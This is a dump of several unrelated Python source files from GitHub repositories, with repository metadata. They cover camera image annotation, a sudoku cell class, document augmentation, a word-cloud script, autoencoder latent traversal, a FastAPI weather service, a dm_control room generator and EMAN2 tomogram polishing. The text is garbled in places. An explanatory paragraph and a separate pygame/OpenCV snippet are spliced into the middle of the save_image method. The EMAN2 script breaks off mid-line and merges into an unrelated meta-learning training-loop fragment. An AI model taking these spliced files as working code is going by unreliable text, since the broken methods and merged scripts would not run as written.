0)\n\n        # Line thickness of 2 px\n        thickness = 2\n\n        # get the width and height of the text box\n        (text_width, text_height) = cv2.getTextSize(text, font, fontScale=fontScale, thickness=1)[0]\n\n        # make the coords of the box with a small padding of two pixels\n        box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height - 2))\n        cv2.rectangle(img, box_coords[0], box_coords[1], rectangle_bgr, cv2.FILLED)\n\n        # Using cv2.putText() method\n        cv2.putText(img, text, (text_offset_x, text_offset_y), font, fontScale, color, thickness, cv2.LINE_AA)\n        return img\n\n    def save_image(self, img, num):\n        
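The take_image fix above hinges on converting a pygame Surface into an array OpenCV understands. A standalone round-trip on a synthetic surface (assuming pygame and opencv-python are installed):

import numpy as np
import pygame
import cv2

surface = pygame.Surface((640, 480))
surface.fill((255, 0, 0))                    # pure red in pygame's RGB
arr = pygame.surfarray.array3d(surface)      # shape (width, height, 3), RGB
arr = np.transpose(arr, (1, 0, 2))           # OpenCV expects (height, width, 3)
bgr = cv2.cvtColor(arr, cv2.COLOR_RGB2BGR)   # and BGR channel order
print(bgr.shape, bgr[0, 0])                  # (480, 640, 3) [  0   0 255]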
name = str(self.path) + '/' + str(num) + '.jpg'  # cv2.imwrite needs a file extension to pick the format\n        cv2.imwrite(name, img)\n\n    ","repo_name":"HemavFoundation/HF-LOCUST-WASP","sub_path":"scripts/image_processing/visual_camera_interface.py","file_name":"visual_camera_interface.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"}
{"seq_id":"24613950465","text":"\nclass Element:\n    \n    def __init__(self, rindex, cindex):\n        self.rindex = rindex\n        self.cindex = cindex\n        self.number = None\n        self.color = None\n        self.state = 0\n\n    def update(self, color=None, number=None, string=None):\n        if string:\n            if string[-1] != \"#\":\n                self.color = string[-1]\n            if string[:-1] != \"*\":\n                self.number = string[:-1]\n        if color and color != \"#\":\n            self.color = color\n        if number and number != \"*\":\n            self.number = number\n        self.state = bool(number)*2 + bool(color)\n\n    def get_neighbors(self, size):\n        result = []\n        if self.rindex > 0:\n            result.append((self.rindex - 1, self.cindex))\n        if self.rindex < size-1:\n            result.append((self.rindex + 1, self.cindex))\n        if self.cindex > 0:\n            result.append((self.rindex, self.cindex - 1))\n        if self.cindex < size-1:\n            result.append((self.rindex, self.cindex + 1))\n        return result\n\n    def __str__(self):\n        return \"%s%s\" % (self.number or \"*\",\n                         self.color or \"#\")\n","repo_name":"bateternal/sudoku-solver","sub_path":"element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"71785270544","text":"import os\nimport argparse\nimport cv2\nfrom DocumentAugmentation import DocumentAugmentation\nimport glob \n\ndef SingleImage(src,des):\n    image = cv2.imread(src)\n\n    # Perform Augmentation\n    Dialated = DocumentAugmentation.Dialate(image) # Do not use for OCR\n    Smudged = DocumentAugmentation.Smudge(image) # Do not use for OCR \n    colored = DocumentAugmentation.changeColor(image) # This will randomly select color\n    BUimage = DocumentAugmentation.BrightnessUp(image)\n    BDimage = DocumentAugmentation.BrightnessDown(image)\n    \n    # file name\n    s = src.split(\"/\")[-1].split(\".\")[:-1]\n    filename = ' '.join([str(elem) for elem in s])\n\n    print(\"Processing : \",filename)\n    # Save Augmentations (.jpg and .png Only)\n    if des is None:\n        des = src\n    else:\n        des += filename\n\n    print(\"Saving to \",des)\n    cv2.imwrite(des+\"_dialation.jpg\",Dialated)\n    cv2.imwrite(des+\"_Smudged.jpg\",Smudged)\n    cv2.imwrite(des+\"_colored.jpg\",colored)\n    cv2.imwrite(des+\"_BUimage.jpg\",BUimage)\n    cv2.imwrite(des+\"_BDimage.jpg\",BDimage)\n\ndef MultipleImage(src,des):\n    images = glob.glob(src)\n    for image in images:\n        SingleImage(image,des)\n\ndef parse_args():\n    parser = argparse.ArgumentParser(description=\"WB color augmenter\")\n    p = parser.add_argument\n    p(\"--input_image_filename\", help=\"Input image's full filename (for a single image augmentation)\")\n    p(\"--input_image_dir\", help=\"Training image directory (use it for batch processing)\")\n    p(\"--out_dir\", help=\"Output directory\")\n    p(\"--write_original\", type=int, default=1, help=\"Save copy of original image(s) in out_dir\")\n    return parser.parse_args()\n\ndef main():\n    args = parse_args()\n    if args.input_image_filename is not None:\n        if args.out_dir is None:\n            args.out_dir = \"./Augmented/\"\n        os.makedirs(args.out_dir, exist_ok=True) # create output training directory (if not exist)\n        SingleImage(args.input_image_filename,args.out_dir)\n    elif args.input_image_dir is not None:\n        if 
args.out_dir is None:\n args.out_dir = \"./Augmented/\"\n os.makedirs(args.out_dir, exist_ok=True) \n MultipleImage(args.input_image_dir,args.out_dir)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AyanGadpal/Document-Image-Augmentation","sub_path":"DocAug.py","file_name":"DocAug.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"47"} +{"seq_id":"21842384287","text":"import jieba.analyse\nimport pymongo\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\nimport re\nimport csv\n\nMONGO_URI = '127.0.0.1:27017'\nMONGO_DATABASE = 'position'\ncollection_name = 'PositionItem'\n\nclient = pymongo.MongoClient(MONGO_URI)\ndb = client[MONGO_DATABASE]\n\n# Handling salary field\n# for position in db[collection_name].find():\n# db[collection_name].update_one({'positionId': position['positionId']},\n# {'$set': {'salary': re.match('\\d+', position['salary']).group(0) + 'K'}})\n\ntext = ''\nfor position in db[collection_name].find():\n text += position['description'] + '\\n'\njieba.analyse.set_stop_words('stop_words.txt')\ntags = jieba.analyse.extract_tags(text, 100, withWeight=True, allowPOS=('n', 'eng'))\nwordcloud = WordCloud(font_path='C:\\Windows\\Fonts\\Microsoft YaHei\\msyh.ttc').fit_words(dict(tags))\nplt.imshow(wordcloud, interpolation=\"bilinear\")\nplt.axis(\"off\")\nplt.show()\n# mongoexport --db position --collection PositionItem --type=csv --fields positionId,education,city,salary,workYear,companySize,financeStage --out PositionItem.csv\n\n# Handling and exporting industryField field\n# industryField_list = {}\n# for position in db[collection_name].find():\n# if position['industryField'] is not None:\n# for industryFields in position['industryField'].split(','):\n# for industryField in industryFields.split('、'):\n# industryField_list[industryField] = industryField_list.get(industryField, 1) + 1\n# with open('IndustryField.csv', 'w', encoding='utf-8', newline='') as f:\n# writer = csv.writer(f)\n# writer.writerow(['industryField', 'totalCount'])\n# writer.writerows(industryField_list.items())\n","repo_name":"hy59/position","sub_path":"dataprocessing.py","file_name":"dataprocessing.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27674557064","text":"#!/usr/bin/env python\n\"\"\"\nlinear space interpolation\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport os\nimport copy\nimport numpy as np\nfrom tqdm.autonotebook import tqdm\nfrom torchvision.utils import save_image\n\nfrom dataloaders import *\nfrom convolutional import Decoder\n\ntorch.manual_seed(9001)\n\nfrom fgsm import Autoencoder\n\n\ndef save_image_as_numpy(use_cuda):\n 'get dataloader for test set with batch size = 1'\n batch_size = 64\n test_batch_size = 1\n epochs = 100\n path = 'data'\n _, test_loader = get_mnist(path, use_cuda, batch_size, test_batch_size)\n return test_loader\n\n\ndef traverse_sigmoidal_latent_space(model, batch, device):\n 'for every axis in latent space, traverse individually from -1 to 1'\n batch = batch.to(device)\n latent = model.encoder(batch)[0]\n traversed = []\n for j in range(10):\n traverse = []\n for i in range(32):\n t = copy.deepcopy(latent)\n t[i] = j / 9\n traverse.append(t)\n traverse = torch.stack(traverse)\n traverse = traverse.to(device)\n traverse = model.decoder(traverse)\n traversed.append(traverse)\n 
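The position-analysis record above feeds jieba keyword weights straight into WordCloud.fit_words. A tiny stand-in corpus shows the same flow without MongoDB or matplotlib (assuming jieba and wordcloud are installed; the real script also sets stop words and a Chinese font):

import jieba.analyse
from wordcloud import WordCloud

text = 'python crawler mongodb python data analysis python scrapy'
tags = jieba.analyse.extract_tags(text, topK=5, withWeight=True)
cloud = WordCloud(width=400, height=200).fit_words(dict(tags))
cloud.to_file('tags.png')  # write to disk instead of plt.imshow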
return traversed\n\n\ndef latent_traversal(test_loader, model, device, folder, i):\n 'traverse all 32 axes of the latent representation to produce an image'\n # get batch\n for batch, _ in test_loader:\n break\n # traverse latent space and save image\n traversed = traverse_sigmoidal_latent_space(model, batch, device)\n traversed = torch.stack(traversed)\n traversed = traversed.view(320, 1, 28, 28)\n save_image(traversed.cpu(), f'{folder}/{i}.png', nrow=32)\n\n\ndef main():\n folder = 'interpolate'\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n for i in range(1, 100):\n with torch.no_grad():\n use_cuda = torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n model = Autoencoder().to(device)\n model.load_state_dict(torch.load(f'fgsm/{i}.pt'))\n\n test_loader = save_image_as_numpy(use_cuda)\n latent_traversal(test_loader, model, device, folder, i)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dyth/generative_models","sub_path":"autoencoders/mnist_old/interpolate.py","file_name":"interpolate.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"3171729048","text":"n = int(input())\r\ncount = 0\r\nfor _ in range(n):\r\n s = input()\r\n temp = ''\r\n a = []\r\n for i in s:\r\n if i != temp and i in a:\r\n count -= 1\r\n break\r\n elif i != temp and i not in a:\r\n a.append(i)\r\n temp = i\r\n count += 1\r\nprint(count)","repo_name":"tacowasabii/online-judge","sub_path":"백준/Silver/1316. 그룹 단어 체커/그룹 단어 체커.py","file_name":"그룹 단어 체커.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28525361020","text":"import json\nfrom fastapi import FastAPI\nfrom starlette.staticfiles import StaticFiles\nfrom pathlib import Path\nfrom api import weather_api\nfrom services import openweather_service\nfrom views import home\n\n# docs_url=None if docs not needed\napp = FastAPI()\n\n\ndef configure():\n configure_routing()\n configure_apikeys()\n\n\ndef configure_apikeys():\n file = Path('settings.json').absolute()\n if not file.exists():\n print(f\"WARNING: {file} file not found, you cannot continue, please see settings_template.json\")\n raise Exception(\"settings.json file not found, you cannot continue, please see settings_template.json\")\n\n with open('settings.json') as fin:\n settings = json.load(fin)\n openweather_service.api_key = settings.get('api_key')\n\n\ndef configure_routing():\n # mount static files e.g css, images e.t.c\n app.mount('/static', StaticFiles(directory='static'), name='static')\n\n # includes modular routes\n app.include_router(weather_api.router)\n app.include_router(home.router)\n\n\nconfigure()\n","repo_name":"Danielatonge/WeatherAPI-FASTAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73566302863","text":"import labmaze\nimport numpy as np\n_PADDING = 4\n\n\nclass PaddedRoom(labmaze.BaseMaze):\n \"\"\"A LabMaze square room where the outermost cells are always empty.\"\"\"\n\n def __init__(self,\n room_size,\n num_objects=0,\n random_state=None,\n pad_with_walls=True,\n num_agent_spawn_positions=1):\n self._room_size = room_size\n self._num_objects = num_objects\n self._num_agent_spawn_positions = num_agent_spawn_positions\n self._random_state = random_state or np.random\n\n 
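traverse_sigmoidal_latent_space above sweeps one latent axis over [0, 1] (the j / 9 steps) while holding the others fixed. A minimal torch sketch of a single axis, with an identity stand-in where the real code calls model.decoder:

import torch

latent = torch.zeros(32)
axis = 3
steps = torch.stack([latent.clone() for _ in range(10)])
steps[:, axis] = torch.linspace(0.0, 1.0, 10)   # j / 9 for j in 0..9
decoded = steps                                 # a real model would run model.decoder(steps)
print(decoded.shape)                            # torch.Size([10, 32])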
empty_maze = '\\n'.join(['.' * (room_size + _PADDING)] *\n                                (room_size + _PADDING) + [''])\n\n        self._entity_layer = labmaze.TextGrid(empty_maze)\n\n        if pad_with_walls:\n            self._entity_layer[0, :] = '*'\n            self._entity_layer[-1, :] = '*'\n            self._entity_layer[:, 0] = '*'\n            self._entity_layer[:, -1] = '*'\n\n        self._variations_layer = labmaze.TextGrid(empty_maze)\n\n    def regenerate(self):\n        self._entity_layer[1:-1, 1:-1] = ' '\n        self._variations_layer[:, :] = '.'\n\n        generated = list(\n            self._random_state.choice(\n                self._room_size * self._room_size,\n                self._num_objects + self._num_agent_spawn_positions,\n                replace=False))\n        for i, obj in enumerate(generated):\n            if i < self._num_agent_spawn_positions:\n                token = labmaze.defaults.SPAWN_TOKEN\n            else:\n                token = labmaze.defaults.OBJECT_TOKEN\n            obj_y, obj_x = obj // self._room_size, obj % self._room_size\n            self._entity_layer[obj_y + int(_PADDING / 2),\n                               obj_x + int(_PADDING / 2)] = token\n\n    @property\n    def entity_layer(self):\n        return self._entity_layer\n\n    @property\n    def variations_layer(self):\n        return self._variations_layer\n\n    @property\n    def width(self):\n        return self._room_size + _PADDING\n\n    @property\n    def height(self):\n        return self._room_size + _PADDING\n","repo_name":"deepmind/dm_control","sub_path":"dm_control/locomotion/arenas/padded_room.py","file_name":"padded_room.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":3200,"dataset":"github-code","pt":"47"}
{"seq_id":"4232646296","text":"# define the products, prices and quantities\r\nprodutos = ['A', 'B', 'C']\r\nprecos = [147.3, 75.4, 35.7]\r\nquantidades = [23, 14, 7]\r\n# iterate and multiply each price by its quantity\r\npos = 0\r\nfor preco in precos:\r\n    # check whether each product's revenue reached the target\r\n    if (preco * quantidades[pos]) > 1000:\r\n        print('Product {} reached the revenue target!'.format(produtos[pos]))\r\n    else:\r\n        print('Product {} did not reach the revenue target!'.format(produtos[pos]))\r\n    pos = pos + 1","repo_name":"Moreno2Marcos/PYTHON","sub_path":"Python_skills/FOR_02.py","file_name":"FOR_02.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
{"seq_id":"70083423822","text":"n = int(input(\"Enter the number of rows for Pascal's Triangle: \"))\n\ntriangulo = [[1]]\n\nfor i in range(1, n):\n    linha = [1]\n    linha_anterior = triangulo[i-1]\n    j = 1\n    while j < i:\n        linha += [linha_anterior[j-1] + linha_anterior[j]]\n        j += 1\n    linha += [1]\n    triangulo += [linha]\n\nfor linha in triangulo:\n    num_espaço = n - len(linha)\n    print(\" \" * num_espaço, end=\"\")\n    \n    for numero in linha:\n        print(numero, end=\" \")\n    \n    print()","repo_name":"DanielNaiff/Computer_Science_UFPA","sub_path":"1º_Semester/Algotithms/atividade 03/atv3-ex14.py","file_name":"atv3-ex14.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"72903058063","text":"#!/usr/bin/env python\n# Muyuan Chen 2023-03\nfrom EMAN2 import *\nimport numpy as np\n\nemdir=e2getinstalldir()\nsys.path.insert(0,os.path.join(emdir,'bin'))\nfrom e2tomogram import *\n\ndef main():\n\t\n\tusage=\"\"\"\n\tPolish a tomogram given the subtilt refinement of particles inside. 
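PaddedRoom.regenerate places spawn points and objects by drawing flat cell indices without replacement and unflattening them to (row, col). The same trick in isolation:

import numpy as np

room_size, num_objects = 4, 3
rng = np.random.RandomState(0)
flat = rng.choice(room_size * room_size, num_objects, replace=False)
cells = [(int(i) // room_size, int(i) % room_size) for i in flat]
print(cells)  # three distinct cells inside the 4x4 room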
\n\te2spt_polishtomo.py --fname tomograms/xxxx.hdf --path spt_xx \n\t\"\"\"\n\tparser = EMArgumentParser(usage=usage,version=EMANVERSION)\n\tparser.add_argument(\"--path\", type=str,help=\"path of spt refinement\", default=None)\n\tparser.add_argument(\"--fname\", type=str,help=\"name of tomogram\", default=None)\n\tparser.add_argument(\"--nneighbor\", type=int,help=\"number of neighbors\", default=5)\n\tparser.add_argument(\"--res\", type=float,help=\"lowpass filter the output to the target resolution.\", default=50)\n\tparser.add_argument(\"--makeraw\", action=\"store_true\", default=False ,help=\"skip polish for testing\")\n\n\t(options, args) = parser.parse_args()\n\tlogid=E2init(sys.argv)\n\t\t\n\tpath=options.path\n\n\tprint(\"Gathering metadata...\")\n\tinfo3d=load_lst_params(f\"{path}/particle_info_3d.lst\")\n\tinfo2d=load_lst_params(f\"{path}/particle_info_2d.lst\")\n\tfor i in range(99,0,-1):\n\t\tfm=f\"{path}/aliptcls3d_{i:02d}.lst\"\n\t\tif os.path.isfile(fm):\n\t\t\toptions.loadali3d=fm\n\t\t\tbreak\n\tprint(\"using 3d alignment from {}\".format(options.loadali3d))\n\n\tfor i in range(99,0,-1):\n\t\tfm=f\"{path}/aliptcls2d_{i:02d}.lst\"\n\t\tif os.path.isfile(fm):\n\t\t\tlst=load_lst_params(fm, range(10))\n\t\t\toptions.loadali2d=fm\n\t\t\tbreak\n\tprint(\"using 2d alignment from {}\".format(options.loadali2d))\n\n\talipm=load_lst_params(options.loadali2d)\n\tfor i,a in zip(info2d, alipm):\n\t\ti[\"pastxf\"]=a[\"xform.projection\"]\n\t\ti[\"score\"]=a[\"score\"]\n\t\tif \"defocus\" in a:\n\t\t\ti[\"defocus\"]=a[\"defocus\"]\n\t\telse:\n\t\t\ti[\"defocus\"]=0\n\n\talipm=load_lst_params(options.loadali3d)\n\tfor i,a in zip(info3d, alipm):\n\t\ti[\"xform.align3d\"]=a[\"xform.align3d\"]\n\t\ti[\"score\"]=a[\"score\"]\n\n\t#info2d=read_aliptcls(aliptcls, info2d)\n\tfilenames, ptclcount=np.unique([d[\"src\"] for d in info3d], return_counts=True)\n\n\tprint(\"load {} particles from {} tomograms\".format(len(info3d), len(filenames)))\n\t\n\tif options.fname==None and len(args)>0:\n\t\ttomonames=[f for f in args if not f.endswith(\"_polish.hdf\")]\n\telse:\n\t\ttomonames=[options.fname]\n\t\t\n\tfor tname in tomonames:\n\t\tfname=[f for f in filenames if base_name(f)==base_name(tname)]\n\t\tif len(fname)==0:\n\t\t\tprint(\"cannot find file\")\n\t\t\tprint(options.fname)\n\t\t\tprint(filenames)\n\t\t\t\n\t\tfname=fname[0]\t\n\t\tprint(f\"Polishing tomogram {fname}\")\n\t\td3d=[d for d in info3d if d[\"src\"]==fname]\n\t\tf=fname.replace(\"particles3d\", \"particles\")\n\t\ttid=np.array([d[\"tilt_id\"] for d in info2d if d[\"src\"]==f])\n\t\ttid=np.sort(np.unique(tid))\n\t\tprint(\"Loading {} particles from {} tilts...\".format(len(d3d), len(tid)))\n\n\t\tsel_coord=[]\n\t\tsel_score=[]\n\t\tsel_defocus=[]\n\t\tsel_dxy=[]\n\t\ttltang=[]\n\t\tfor td in tid:\n\n\t\t\td3ds=[d for d in info3d if d[\"src\"]==fname]\n\t\t\td2d=[]\n\t\t\td3d=[]\n\t\t\tfor d3 in d3ds:\n\t\t\t\td2=[info2d[d] for d in d3[\"idx2d\"]]\n\t\t\t\td2=[d for d in d2 if d[\"tilt_id\"]==td]\n\t\t\t\tif len(d2)==0: continue\n\t\t\t\td2d.append(d2[0])\n\t\t\t\td3d.append(d3)\n\n\t\t\txfali=[d[\"pastxf\"] for d in d2d]\n\n\t\t\tcoord=np.array([d[\"coord\"] for d in d3d])\n\t\t\ttxfs=[d[\"xform.align3d\"].inverse() for d in d3d]\n\t\t\tcoord-=np.array([t.get_trans() for t in txfs])\n\n\t\t\txfpj=[d[\"xform.projection\"] for d in d2d]\n\t\t\ttltang.append(np.mean([x.get_params(\"xyz\")[\"ytilt\"] for x in xfpj]))\n\t\t\txfraw=[a*b for a,b in zip(xfpj, txfs)]\n\n\n\t\t\tpastxf=([b*a.inverse()for a,b in zip(xfraw, 
xfali)])\n\t\t\tdxy=np.array([a.get_trans() for a in pastxf])\n\t\t\tscore=[d[\"score\"] for d in d2d]\n\t\t\tdefocus=[d[\"defocus\"] for d in d2d]\n\n\t\t\tsel_score.append(score)\n\t\t\tsel_dxy.append(dxy)\n\t\t\tsel_coord.append(coord)\n\t\t\tsel_defocus.append(defocus)\n\n\t\tplt_scr=[np.mean(s) for s in sel_score]\n\t\tplt_def=[np.mean(abs(np.array(s))) for s in sel_defocus]\n\t\tplt_dxy=[np.mean(np.linalg.norm(d, axis=1)) for d in sel_dxy]\n\t\tsel_tid=int(np.mean(tid))\n\t\ttltang=np.array(tltang)\n\t\t\t\n\t\tinfo=js_open_dict(info_name(fname))\n\t\ttfile=info[\"tlt_file\"]\n\t\tif \"defocus\" in info:\n\t\t\tprint(\"Loading CTF information. will do phase flipping for tomograms\")\n\t\t\toptions.ctf={\t\"defocus\":info[\"defocus\"], \"phase\":info[\"phase\"], \n\t\t\t\t\t\"cs\":info[\"cs\"], \"voltage\":info[\"voltage\"]}\n\t\telse:\n\t\t\toptions.ctf=None\n\t\t\t\n\t\timgs_raw=EMData.read_images(tfile)\n\n\t\timgs_1k=[]\n\t\tfor m in imgs_raw:\n\t\t\te=m.process(\"math.fft.resample\",{\"n\":4})\n\t\t\te.process_inplace(\"normalize.edgemean\")\n\t\t\timgs_1k.append(e)\n\t\t\t\n\t\ttltpm=np.array(info[\"tlt_params\"]).copy()\n\t\t\n\t\toptions.threads=12\n\t\timgs=imgs_1k\n\t\te=EMData(options.loadali3d,0, True)\n\t\toptions.xfscale=imgs[0][\"apix_x\"]/e[\"apix_x\"]\n\t\tprint(f\"apix of tomogram: {imgs[0]['apix_x']:.2f}, apix of particles: {e['apix_x']:.2f}, scale xform by {options.xfscale:.2f}\")\n\t\toptions.filterto=imgs[0][\"apix_x\"]/options.res\n\n\t\tnum=len(imgs)\n\t\tscale=4\n\t\timgsz=min(imgs[0][\"nx\"],imgs[0][\"ny\"])\n\n\t\tprint(\"Making bin{:d} tomogram by tiling...\".format(int(np.round(scale))))\n\t\ttpm=tltpm.copy()\n\t\ttpm[:,:2]/=scale\n\n\t\tnrange=list(range(num))\n\t\tnx, ny=imgs[0][\"nx\"], imgs[0][\"ny\"]\n\t\t\n\t\t\n\t\tbds=[]\n\t\tfor t in tpm:\n\t\t\trot=Transform({\"type\":\"2d\",\"tx\":t[0], \"ty\":t[1],\"alpha\":t[2]})\n\t\t\tp=np.array([rot.transform([nx/2, ny/2, 0]),rot.transform([nx/2, -ny/2, 0])])\n\t\t\tp=np.max(abs(p), axis=0)\n\t\t\t\n\t\t\tbds.append(p)\n\t\t\t\n\t\tbds=np.array(bds)\n\t\tbds=np.median(abs(bds), axis=0)*2 ## so we clip a rectangle area that covers half of the tilt images\n\t\t\n\t\toutx=good_size(bds[0])\n\t\touty=good_size(bds[1])\n\t\tprint(\"tomogram shape: {} x {}\".format(outx, outy))\n\n\t\tclipz=256\n\t\tsz=256 #### this is the output 3D size \n\t\tpad=good_size(sz*1.4) #### this is the padded size in fourier space\n\t\toptions.outz=outz=clipz\n\t\toptions.step=step=sz//2\n\n\t\tfull3d=EMData(outx, outy, outz)\n\t\tmem=(outx*outy*outz*4+pad*pad*pad*options.threads*4)\n\t\tprint(\"This will take {}x{}x{}x4 + {}x{}x{}x{}x4 = {:.1f} GB of memory...\".format(outx, outy, outz, pad, pad, pad,options.threads, mem/1024**3))\n\t\twtcon=1\n\t\tjsd=queue.Queue(0)\n\t\t\n\t\tjobs=[]\n\t\tnstepx=int(outx/step/2)\n\t\tnstepy=int(outy/step/2)\n\t\tcoord=sel_coord[0]/options.xfscale\n\n\t\ttpos=[]\n\t\t\n\t\tif options.ctf!=None:\n\t\t\tctf=EMAN2Ctf()\n\t\t\tctf.from_dict({\n\t\t\t\t\"defocus\":1.0, \"voltage\":options.ctf[\"voltage\"], \"bfactor\":0., \"cs\":options.ctf[\"cs\"],\"ampcont\":0, \"apix\":imgs[0][\"apix_x\"]})\n\t\t\tdfs=[]\n\t\t\t\n\t\tfor stepx in range(-nstepx,nstepx+1):\n\t\t\t#### shift y by half a tile\n\t\t\tyrange=range(-nstepy,nstepy+1)\n\t\t\t\n\t\t\tfor stepy in yrange:\n\t\t\t\ttiles=[]\n\t\t\t\tfor i in range(num):\n\t\t\t\t\tif i in nrange:\n\t\t\t\t\t\tt=tpm[i]\n\t\t\t\t\t\tpos=[stepx*step,stepy*step,0]\n\t\t\t\t\t\tpxf=get_xf_pos(t, 
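get_xf_pos (defined in e2tomogram, not shown here) maps a 3D tile position into 2D tilt-image coordinates. A rough NumPy stand-in for a single y-axis tilt, ignoring the in-plane rotation and shifts the real transform also carries:

import numpy as np

def tilt_project(pos, ytilt_deg):
    # rotate about the y axis, then drop z
    a = np.deg2rad(ytilt_deg)
    x, y, z = pos
    return np.array([x * np.cos(a) + z * np.sin(a), y])

print(tilt_project([100.0, 50.0, 0.0], 30.0))  # x foreshortened to ~86.6, y unchanged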
pos)\n\t\t\t\t\t\timg=imgs[i]\n\t\t\t\t\t\tm=img.get_clip(Region(img[\"nx\"]//2-pad//2+pxf[0],img[\"ny\"]//2-pad//2+pxf[1], pad, pad), fill=0)\n\t\t\t\t\t\t\n\t\t\t\t\t\tif options.ctf!=None:\n\t\t\t\t\t\t\trot=Transform({\"type\":\"xyz\",\"xtilt\":float(t[4]),\"ytilt\":float(t[3])})\n\t\t\t\t\t\t\tp1=rot.transform(pos)\n\t\t\t\t\t\t\tpz=p1[2]*img[\"apix_x\"]/10000.\n\t\t\t\t\t\t\tctf.defocus=options.ctf[\"defocus\"][i]-pz\n\t\t\t\t\t\t\tctf.set_phase(options.ctf[\"phase\"][i]*np.pi/180.)\n\t\t\t\t\t\t\tdfs.append(ctf.defocus)\n\t\t\t\t\t\t\tm[\"ctf\"]=ctf\n\t\t\t\t\t\t\n\t\t\t\t\t\ttiles.append(m)\n\n\t\t\t\tjobs.append((jsd, tiles, tpm, sz, pad, stepx, stepy, coord, sel_dxy, options))\n\n\t\tx,y=np.indices((sz,sz),dtype=float)/sz-.5\n\t\t#f=.25-(x**2+y**2)/2 + ((abs(x)-0.5)**2+(abs(y)-0.5)**2)/2\n\t\tf=wtcon+np.exp(-(x**2+y**2)/0.1) - np.exp(-((abs(x)-0.5)**2+(abs(y)-0.5)**2)/0.1)\n\t\tf3=np.repeat(f[None, :,:], outz, axis=0)\n\t\tmsk=from_numpy(f3).copy()\n\t\t\n\t\tthrds=[threading.Thread(target=reconstruct_tile,args=([i])) for i in jobs]\n\t\tprint(\"now start threads...\")\n\t\tthrtolaunch=0\n\t\ttsleep=threading.active_count()\n\t\t\n\t\twhile thrtolaunch<len(thrds) or threading.active_count()>tsleep or not jsd.empty():\n\t\t\tif thrtolaunch
print('confidence_score:', confidence_score)\n # prototypes = torch.cuda.FloatTensor((num_class, top_k)).fill_(0.0)\n \n for i in range(args.num_fast):\n targets_fast = targets.clone()\n randidx = torch.randperm(targets.size(0))\n if args.use_wcl:\n loss_weights = torch.cuda.FloatTensor(targets.size()).fill_(args.init_weight)\n for n in range(int(targets.size(0)*args.perturb_ratio)):\n idx = randidx[n]\n feat = feats[idx]\n feat.view(1,feat.size(0))\n feat.data = feat.data.expand(targets.size(0),feat.size(0))\n dist = torch.sum((feat-feats)**2,dim=1)\n _, neighbor = torch.topk(dist.data,args.num_neighbor+1,largest=False)\n targets_fast[idx] = targets[neighbor[random.randint(1,args.num_neighbor)]]\n if args.use_wcl:\n neighbor_labels = torch.gather(targets, 0, neighbor)\n label_histogram = torch.bincount(neighbor_labels)\n loss_weights[idx] = 2 * args.init_weight * torch.sigmoid(torch.log(torch.true_divide(label_histogram[targets[idx]], label_histogram[targets_fast[idx]])) * args.T)\n \n fast_loss = criterion(outputs,targets_fast)\n \n grads = torch.autograd.grad(fast_loss, net.parameters(), create_graph=True, retain_graph=True, only_inputs=True)\n # grads = torch.autograd.grad(fast_loss, net.parameters())\n \n # grads_list = list(grads)\n # print('grads_list')\n # print(len(grads_list))\n # for grad in grads_list:\n # print(grad.shape)\n \n for grad in grads:\n grad = grad.detach()\n grad.requires_grad = False\n fast_weights = OrderedDict((name, param - args.fast_lr*grad) for ((name, param), grad) in zip(net.named_parameters(), grads))\n # grads_temp = [grad.detach() for grad in grads]\n # for grad in grads_temp:\n # grad.requires_grad = False\n # fast_weights = OrderedDict((name, param - args.fast_lr*grad) for ((name, param), grad) in zip(net.named_parameters(), grads_temp))\n \n fast_out = net.forward(inputs,fast_weights) \n \n logp_fast = F.log_softmax(fast_out,dim=1)\n \n if args.use_wcl:\n if i == 0:\n consistent_loss = torch.matmul(torch.mean(consistent_criterion(logp_fast,p_tch), dim=1), loss_weights)\n else:\n consistent_loss = consistent_loss + torch.matmul(torch.mean(consistent_criterion(logp_fast,p_tch), dim=1), loss_weights)\n else:\n if i == 0:\n consistent_loss = consistent_criterion(logp_fast,p_tch)\n else:\n consistent_loss = consistent_loss + consistent_criterion(logp_fast,p_tch)\n if args.num_fast > 0:\n meta_loss = consistent_loss*meta_lr/args.num_fast \n meta_loss.backward(retain_graph=True)\n\n ssl_lr = meta_lr\n for i in range(args.num_ssl):\n targets_fast = targets.clone()\n rand_lb_pair = np.random.choice(range(num_class), size=2, replace=True)\n loss_mask = torch.cuda.FloatTensor(num_class).fill_(1.0)\n for idx in rand_lb_pair:\n loss_mask[idx] = 0.0\n # print('targets:', targets)\n # print('rand_lb_pair:', rand_lb_pair)\n # print('loss_mask:', loss_mask)\n idx0 = [idx for idx in range(targets.size(0)) if targets[idx] == rand_lb_pair[0]]\n # idx1 = [idx for idx in range(targets.size(0)) if targets[idx] == rand_lb_pair[1]]\n # print('idx0:', idx0)\n # print('idx1:', idx1)\n for n in range(targets.size(0)):\n if n in 